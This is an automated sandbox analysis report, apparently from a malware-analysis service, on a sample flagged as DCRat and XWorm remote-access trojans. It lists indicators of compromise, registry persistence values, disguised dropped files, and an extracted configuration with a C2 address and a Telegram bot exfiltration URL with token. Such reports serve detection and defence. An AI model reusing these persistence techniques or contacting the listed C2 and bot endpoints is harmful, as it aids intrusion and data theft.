dcrat | 0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53

Analysis

max time kernel
8s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe
Size

13.0MB
MD5

5038e381411591332b285c540d4b6bef
SHA1

4af0f013e8652e3d03c296a59c67c70508e39612
SHA256

0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53
SHA512

3055db5a385b9e27cd6e7718a45bf1695ac0d9d798f7089276baf0542227768d5b1d6eb72ddb493a27b346af77c0d40a6a4474beddf77c24eed7b9cf3b06769b
SSDEEP

393216:064QwP3EQ5H+i4IDzQTj4pUbZFdoPgY2:0647P3J5eRInQT0pkFmP2

Score

10^/10

dcrat xworm execution infostealer persistence rat trojan upx

Malware Config

Extracted

Family

xworm

147.185.221.17:14348

147.185.221.17:14348:14348

Attributes

Install_directory
%AppData%
install_file
sgredgkrtf09weut3r435.exe
telegram
https://api.telegram.org/bot7150716400:AAE41jshl4_joK29lZ3HuflfsurF6ZZKlDg/sendMessage?chat_id=5187782651

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Detect Xworm Payload 2 IoCs

Processes:

resource yara_rule

C:\Users\Admin\AppData\Roaming\scvhost.exe family_xworm
behavioral2/memory/2516-53-0x00000000006A0000-0x00000000006B6000-memory.dmp family_xworm

resource	yara_rule
C:\Users\Admin\AppData\Roaming\scvhost.exe	family_xworm
behavioral2/memory/2516-53-0x00000000006A0000-0x00000000006B6000-memory.dmp	family_xworm

Modifies WinLogon for persistence 2 TTPs 9 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

amamamsus.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\", \"C:\\Windows\\ja-JP\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\setup.exe\", \"C:\\Program Files (x86)\\Windows Defender\\de-DE\\msedge.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\", \"C:\\Windows\\ja-JP\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\setup.exe\", \"C:\\Program Files (x86)\\Windows Defender\\de-DE\\msedge.exe\", \"C:\\Program Files\\Windows Portable Devices\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\", \"C:\\Windows\\ja-JP\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\setup.exe\", \"C:\\Program Files (x86)\\Windows Defender\\de-DE\\msedge.exe\", \"C:\\Program Files\\Windows Portable Devices\\conhost.exe\", \"C:\\Users\\Admin\\Videos\\taskhostw.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\", \"C:\\Windows\\ja-JP\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\setup.exe\", \"C:\\Program Files (x86)\\Windows Defender\\de-DE\\msedge.exe\", \"C:\\Program Files\\Windows Portable Devices\\conhost.exe\", \"C:\\Users\\Admin\\Videos\\taskhostw.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\upfc.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\0.1\\services.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\", \"C:\\Windows\\ja-JP\\RuntimeBroker.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\", \"C:\\Windows\\ja-JP\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\setup.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\", \"C:\\Windows\\ja-JP\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\setup.exe\", \"C:\\Program Files (x86)\\Windows Defender\\de-DE\\msedge.exe\", \"C:\\Program Files\\Windows Portable Devices\\conhost.exe\", \"C:\\Users\\Admin\\Videos\\taskhostw.exe\", \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\upfc.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\""	amamamsus.exe

Process spawned unexpected child process 27 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2388	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2780	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3220	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	116	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3656	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3212	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3984	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2484	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1648	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	780	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4864	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2272	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3608	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2780	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4012	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1072	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	764	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5000	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5088	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1196	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2476	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3952	4836	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1400	4836	schtasks.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\dllhost.exe	dcrat
behavioral2/memory/2912-95-0x0000000000E80000-0x0000000001198000-memory.dmp	dcrat
C:\Windows\SoftwareDistribution\Download\SharedFileCache\conhost.exe	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1408	powershell.exe
4056	powershell.exe
4608	powershell.exe
1584	powershell.exe
1012	powershell.exe
1832	powershell.exe
3688	powershell.exe
3904	powershell.exe
4564	powershell.exe
1196	powershell.exe
3680	powershell.exe
2420	powershell.exe
1620	powershell.exe
3212	powershell.exe
1400	powershell.exe
7000	powershell.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dllhost.exescvhost.exeWScript.exeamamamsus.exeWScript.exe0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	scvhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	amamamsus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe

Executes dropped EXE 8 IoCs

Processes:

adb.exedllhost.exefastboot.exescvhost.exeamamamsus.exesetup.exesetup.exeamamamsus.exe

pid process

4552 adb.exe
2280 dllhost.exe
2124 fastboot.exe
2516 scvhost.exe
2912 amamamsus.exe
2344 setup.exe
452 setup.exe
4488 amamamsus.exe

Loads dropped DLL 21 IoCs

Processes:

adb.exefastboot.exesetup.exe

pid	process
4552	adb.exe
4552	adb.exe
2124	fastboot.exe
2124	fastboot.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe
452	setup.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI23442\python311.dll	upx
behavioral2/memory/452-115-0x00007FFC01250000-0x00007FFC01838000-memory.dmp	upx
behavioral2/memory/452-134-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_hashlib.pyd	upx
behavioral2/memory/452-167-0x00007FFC00660000-0x00007FFC007D3000-memory.dmp	upx
behavioral2/memory/452-177-0x00007FFBFF0E0000-0x00007FFBFF10E000-memory.dmp	upx
behavioral2/memory/452-180-0x00007FFBFD9C0000-0x00007FFBFDD35000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\unicodedata.pyd	upx
behavioral2/memory/452-512-0x00007FFBFC070000-0x00007FFBFC18C000-memory.dmp	upx
behavioral2/memory/452-513-0x00007FFC00C00000-0x00007FFC00C23000-memory.dmp	upx
behavioral2/memory/452-508-0x00007FFBFF020000-0x00007FFBFF0D8000-memory.dmp	upx
behavioral2/memory/452-504-0x00007FFC00660000-0x00007FFC007D3000-memory.dmp	upx
behavioral2/memory/452-509-0x00007FFBFD9C0000-0x00007FFBFDD35000-memory.dmp	upx
behavioral2/memory/452-499-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp	upx
behavioral2/memory/452-498-0x00007FFC01250000-0x00007FFC01838000-memory.dmp	upx
behavioral2/memory/452-507-0x00007FFBFF0E0000-0x00007FFBFF10E000-memory.dmp	upx
behavioral2/memory/452-505-0x00007FFC15530000-0x00007FFC15549000-memory.dmp	upx
behavioral2/memory/452-196-0x00007FFBFC070000-0x00007FFBFC18C000-memory.dmp	upx
behavioral2/memory/452-193-0x00007FFC11BB0000-0x00007FFC11BBD000-memory.dmp	upx
behavioral2/memory/452-192-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp	upx
behavioral2/memory/452-191-0x00007FFC0D1B0000-0x00007FFC0D1C4000-memory.dmp	upx
behavioral2/memory/452-185-0x00007FFC01250000-0x00007FFC01838000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\libssl-1_1.dll	upx
behavioral2/memory/452-178-0x00007FFBFF020000-0x00007FFBFF0D8000-memory.dmp	upx
behavioral2/memory/452-170-0x00007FFC15530000-0x00007FFC15549000-memory.dmp	upx
behavioral2/memory/452-171-0x00007FFC15C90000-0x00007FFC15C9D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\sqlite3.dll	upx
behavioral2/memory/452-164-0x00007FFC00C00000-0x00007FFC00C23000-memory.dmp	upx
behavioral2/memory/452-163-0x00007FFC159E0000-0x00007FFC159F9000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_bz2.pyd	upx
behavioral2/memory/452-159-0x00007FFC00C30000-0x00007FFC00C5D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_decimal.pyd	upx
behavioral2/memory/452-577-0x00007FFC01250000-0x00007FFC01838000-memory.dmp	upx
behavioral2/memory/452-583-0x00007FFC00660000-0x00007FFC007D3000-memory.dmp	upx
behavioral2/memory/452-578-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\libffi-8.dll	upx
behavioral2/memory/452-152-0x00007FFC161C0000-0x00007FFC161CF000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_ctypes.pyd	upx
behavioral2/memory/452-612-0x00007FFC159E0000-0x00007FFC159F9000-memory.dmp	upx
behavioral2/memory/452-617-0x00007FFC0D1B0000-0x00007FFC0D1C4000-memory.dmp	upx
behavioral2/memory/452-616-0x00007FFC11BB0000-0x00007FFC11BBD000-memory.dmp	upx
behavioral2/memory/452-615-0x00007FFC15530000-0x00007FFC15549000-memory.dmp	upx
behavioral2/memory/452-614-0x00007FFC00660000-0x00007FFC007D3000-memory.dmp	upx
behavioral2/memory/452-613-0x00007FFC00C00000-0x00007FFC00C23000-memory.dmp	upx
behavioral2/memory/452-611-0x00007FFC00C30000-0x00007FFC00C5D000-memory.dmp	upx
behavioral2/memory/452-610-0x00007FFC161C0000-0x00007FFC161CF000-memory.dmp	upx
behavioral2/memory/452-609-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp	upx
behavioral2/memory/452-608-0x00007FFC15C90000-0x00007FFC15C9D000-memory.dmp	upx
behavioral2/memory/452-607-0x00007FFBFC070000-0x00007FFBFC18C000-memory.dmp	upx
behavioral2/memory/452-604-0x00007FFBFD9C0000-0x00007FFBFDD35000-memory.dmp	upx
behavioral2/memory/452-603-0x00007FFBFF020000-0x00007FFBFF0D8000-memory.dmp	upx
behavioral2/memory/452-602-0x00007FFBFF0E0000-0x00007FFBFF10E000-memory.dmp	upx
behavioral2/memory/452-593-0x00007FFC01250000-0x00007FFC01838000-memory.dmp	upx

Adds Run key to start application 2 TTPs 18 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

amamamsus.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\SoftwareDistribution\\Download\\SharedFileCache\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\ja-JP\\RuntimeBroker.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Windows Defender\\de-DE\\msedge.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Users\\Admin\\Videos\\taskhostw.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Users\\Admin\\Videos\\taskhostw.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\upfc.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\0.1\\services.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Program Files (x86)\\Reference Assemblies\\unsecapp.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\ja-JP\\RuntimeBroker.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\setup = "\"C:\\Recovery\\WindowsRE\\setup.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Windows Defender\\de-DE\\msedge.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\setup = "\"C:\\Recovery\\WindowsRE\\setup.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Portable Devices\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\upfc.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Portable Devices\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\0.1\\services.exe\""	amamamsus.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com

flow	ioc
15	ip-api.com

Drops file in Program Files directory 11 IoCs

Processes:

amamamsus.exe

description	ioc	process
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\ea1d8f6d871115	amamamsus.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\services.exe	amamamsus.exe
File created	C:\Program Files (x86)\Reference Assemblies\unsecapp.exe	amamamsus.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\unsecapp.exe	amamamsus.exe
File created	C:\Program Files\Windows Portable Devices\088424020bedd6	amamamsus.exe
File created	C:\Program Files\Windows Portable Devices\conhost.exe	amamamsus.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\upfc.exe	amamamsus.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\c5b4cb5e9653cc	amamamsus.exe
File created	C:\Program Files (x86)\Reference Assemblies\29c1c3cc0f7685	amamamsus.exe
File created	C:\Program Files (x86)\Windows Defender\de-DE\msedge.exe	amamamsus.exe
File created	C:\Program Files (x86)\Windows Defender\de-DE\61a52ddc9dd915	amamamsus.exe

Drops file in Windows directory 4 IoCs

Processes:

amamamsus.exe

description	ioc	process
File created	C:\Windows\SoftwareDistribution\Download\SharedFileCache\088424020bedd6	amamamsus.exe
File created	C:\Windows\ja-JP\RuntimeBroker.exe	amamamsus.exe
File created	C:\Windows\ja-JP\9e8d7a4ca61bd9	amamamsus.exe
File created	C:\Windows\SoftwareDistribution\Download\SharedFileCache\conhost.exe	amamamsus.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

6952 WMIC.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

5812 tasklist.exe
6420 tasklist.exe
5792 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

6608 systeminfo.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

6248 taskkill.exe
5144 taskkill.exe
5872 taskkill.exe
1384 taskkill.exe
5640 taskkill.exe
5212 taskkill.exe

pid	process
6952	WMIC.exe

pid	process
5812	tasklist.exe
6420	tasklist.exe
5792	tasklist.exe

pid	process
6608	systeminfo.exe

pid	process
6248	taskkill.exe
5144	taskkill.exe
5872	taskkill.exe
1384	taskkill.exe
5640	taskkill.exe
5212	taskkill.exe

Modifies registry class 3 IoCs

Processes:

0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exedllhost.exeamamamsus.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	0b80872ae84d5a7de900b51596d85e09361774ae22cd577ec4898b4350737a53.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	amamamsus.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 28 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
3220	schtasks.exe
4012	schtasks.exe
2476	schtasks.exe
2272	schtasks.exe
1072	schtasks.exe
1196	schtasks.exe
2780	schtasks.exe
3212	schtasks.exe
780	schtasks.exe
3656	schtasks.exe
2780	schtasks.exe
764	schtasks.exe
232	schtasks.exe
2388	schtasks.exe
116	schtasks.exe
4808	schtasks.exe
3608	schtasks.exe
5088	schtasks.exe
3984	schtasks.exe
2484	schtasks.exe
1492	schtasks.exe
1400	schtasks.exe
4808	schtasks.exe
1648	schtasks.exe
4224	schtasks.exe
4864	schtasks.exe
5000	schtasks.exe
3952	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exepowershell.exeamamamsus.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2464	powershell.exe
2464	powershell.exe
2420	powershell.exe
2420	powershell.exe
2912	amamamsus.exe
2912	amamamsus.exe
2464	powershell.exe
2420	powershell.exe
4564	powershell.exe
4564	powershell.exe
4564	powershell.exe
3688	powershell.exe
3688	powershell.exe
3688	powershell.exe
1196	powershell.exe
1196	powershell.exe
4608	powershell.exe
4056	powershell.exe
4056	powershell.exe
4608	powershell.exe
1408	powershell.exe
1408	powershell.exe
3680	powershell.exe
3680	powershell.exe
1400	powershell.exe
1400	powershell.exe
1832	powershell.exe
1832	powershell.exe
3212	powershell.exe
3212	powershell.exe
1584	powershell.exe
1584	powershell.exe
1620	powershell.exe
1620	powershell.exe
1012	powershell.exe
1012	powershell.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

scvhost.exeamamamsus.exeWScript.exepowershell.exepowershell.exepowershell.exeamamamsus.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2516	scvhost.exe
Token: SeDebugPrivilege	2912	amamamsus.exe
Token: SeShutdownPrivilege	3260	WScript.exe
Token: SeCreatePagefilePrivilege	3260	WScript.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	4488	amamamsus.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
